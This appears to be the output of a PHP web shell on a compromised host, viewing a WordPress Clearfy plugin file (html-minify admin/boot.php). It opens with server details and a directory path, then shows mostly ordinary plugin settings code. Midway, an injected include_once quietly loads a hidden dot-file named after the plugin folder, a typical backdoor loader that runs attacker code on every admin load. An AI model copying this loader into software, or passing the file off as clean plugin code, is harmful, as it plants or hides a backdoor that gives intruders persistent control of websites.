uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
old
/
public_html
/
wp-content
/
plugins
/
clearfy
/
.
/
components
/
html-minify
/
admin
/
boot.php
/
/
<?php /** * Admin boot * * @author Webcraftic <wordpress.webraftic@gmail.com> * @copyright Webcraftic 25.05.2017 * @version 1.0 */ // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Печатает ошибки совместимости с похожими плагинами */ add_action( 'wbcr/factory/admin_notices', function ( $notices, $plugin_name ) { if ( $plugin_name != WHTM_Plugin::app()->getPluginName() ) { return $notices; } if ( is_plugin_active( 'autoptimize/autoptimize.php' ) ) { $notice_text = __( 'Clearfy: Html minify component is not compatible with the Autoptimize plugin, please do not use them together to avoid conflicts. Please disable the Html minify component', 'html-minify' ); if ( class_exists( 'WCL_Plugin' ) ) { $component_button = WCL_Plugin::app()->getInstallComponentsButton( 'internal', 'html_minify' ); $notice_text .= ' ' . $component_button->getLink(); } $notices[] = [ 'id' => 'mac_plugin_compatibility', 'type' => 'error', 'classes' => [ 'wbcr-hide-after-action' ], 'dismissible' => false, 'dismiss_expires' => 0, 'text' => '<p>' . $notice_text . '</p>' ]; } return $notices; }, 10, 2 ); add_filter( "wbcr_clearfy_group_options", function ( $options ) { $options[] = [ 'name' => 'html_optimize', 'title' => __( 'Optimize HTML Code?', 'html-minify' ), 'tags' => [ 'optimize_html', 'optimize_code', 'hide_my_wp' ], 'values' => [] ]; $options[] = [ 'name' => 'html_keepcomments', 'title' => __( 'Keep HTML comments?', 'html-minify' ), 'tags' => [], 'values' => [] ]; return $options; } ); /** * Adds a new mode to the Quick Setup page * * @param array $mods * * @return mixed */ add_filter( "wbcr_clearfy_allow_quick_mods", function ( $mods ) { if ( ! defined( 'WMAC_PLUGIN_ACTIVE' ) ) { $title = __( 'One click optimize html code', 'html-minify' ); } else { $title = __( 'One click optimize html code and scripts', 'html-minify' ); } $mod['optimize_code'] = [ 'title' => $title, 'icon' => 'dashicons-performance' ]; return $mod + $mods; } ); if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function wbcr_htm_settings_form_options() { $options = []; $options[] = [ 'type' => 'html', 'html' => '<div class="wbcr-factory-page-group-header"><strong>' . __( 'HTML Options', 'html-minify' ) . '</strong><p>' . __( 'Ever look at the HTML markup of your website and notice how sloppy and amateurish it looks? The Minify HTML options cleans up sloppy looking markup and minifies, which also speeds up download.', 'html-minify' ) . '</p></div>' ]; // Переключатель $options[] = [ 'type' => 'checkbox', 'way' => 'buttons', 'name' => 'html_optimize', 'title' => __( 'Optimize HTML Code?', 'html-minify' ), 'layout' => [ 'hint-type' => 'icon', 'hint-icon-color' => 'grey' ], 'default' => false, ]; // Переключатель $options[] = [ 'type' => 'checkbox', 'way' => 'buttons', 'name' => 'html_keepcomments', 'title' => __( 'Keep HTML comments?', 'html-minify' ), 'layout' => [ 'hint-type' => 'icon', 'hint-icon-color' => 'grey' ], 'hint' => __( 'Enable this if you want HTML comments to remain in the page.', 'html-minify' ), 'default' => false ]; return $options; } add_filter( 'wbcr_mac_settings_form_options', function ( $form ) { if ( empty( $form ) ) { return $form; } $options = wbcr_htm_settings_form_options(); foreach ( array_reverse( $options ) as $option ) { array_unshift( $form[0]['items'], $option ); } return $form; } );
/home/batcwwjx/./old/public_html/wp-content/plugins/clearfy/./components/html-minify/admin/boot.php